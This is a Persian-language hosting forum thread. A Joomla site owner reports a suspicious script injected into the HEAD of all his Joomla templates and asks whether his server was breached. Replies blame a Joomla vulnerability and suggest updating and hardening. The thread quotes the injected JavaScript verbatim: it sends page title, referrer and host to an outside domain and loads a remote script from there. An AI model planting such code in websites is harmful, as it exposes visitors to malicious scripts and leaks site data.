قرار گرفتن اسکریپت ناشناخته در سایت

[amirreza22]

من یک سرور دایرکت ادمین دارم و یک هاست ایجاد کردم و داخل اون یک سری سایت با جوملا درست کردم.

چند روز پیش یک کد مشکوک جاوا اسکریپت توی HEAD قالب سایتم دیدم که تحقیق کردم دیدم ویروسی هست.
این کد قبلاً توی قالب نبوده و تازه اضافه شده.
کل سایت‌هایی که با جوملا داشتم همگی این کد در قسمت HEADشون قرار گرفته.
سایت‌هایی که با جوملا نبودن این مشکل رو نداشتن و کدی داحلشون اضافه نشده بود.

حالا سوالی که من دارم اینه آیا فردی وارد هاست یا سرورم شده و این کد رو قرار داده در صفحات سایتم؟
یا اینکه نه باگ یا نقص مربوط به جوملاست که این اتفاق براش پیش افتاده؟

کد HTML:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.vermessung-stuetz.de/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

لطفاً راهنمایی کنید من دقیقاً چه کارهایی الان می‌تونم انجام بدم که امنیت سرور بالاتر بره
Direct Admin
Cent OS
APache
SuPHP
CSF Firewall

[lizard.tiny]

سلام

از اونجایی که جوملا یک سیستم متن باز هست پس به نظر من احتمال اینکه این شک مشکل از جوملا هست بیشتر از اینه که مشکل رو از سمت هاست یا سرور بدونید

فکر میکنم یک باگ در جوملا باشه و بهتره این موضوع رو به تیم پشتیبانی و توسعه جوملا گزارش کنید تا زودتر برسی و Patch بشه

[h_eftekhari]

سلام.
مشکل از باگ امنیتی جوملا هستش. به سایت جوملا مراجعه کنید و هشدار امنیتی که در اون وجود داره رو بخونید. جوملا رو به ویرایش جدید آپدیت کنید. در دایرکت ادمین از پلاگین comodo استفاده کنید. مشکلات امنیتی جوملا در آخرین آپدیت comodo اصلاح شده. روی پوشه administrator پسورد بگذارید.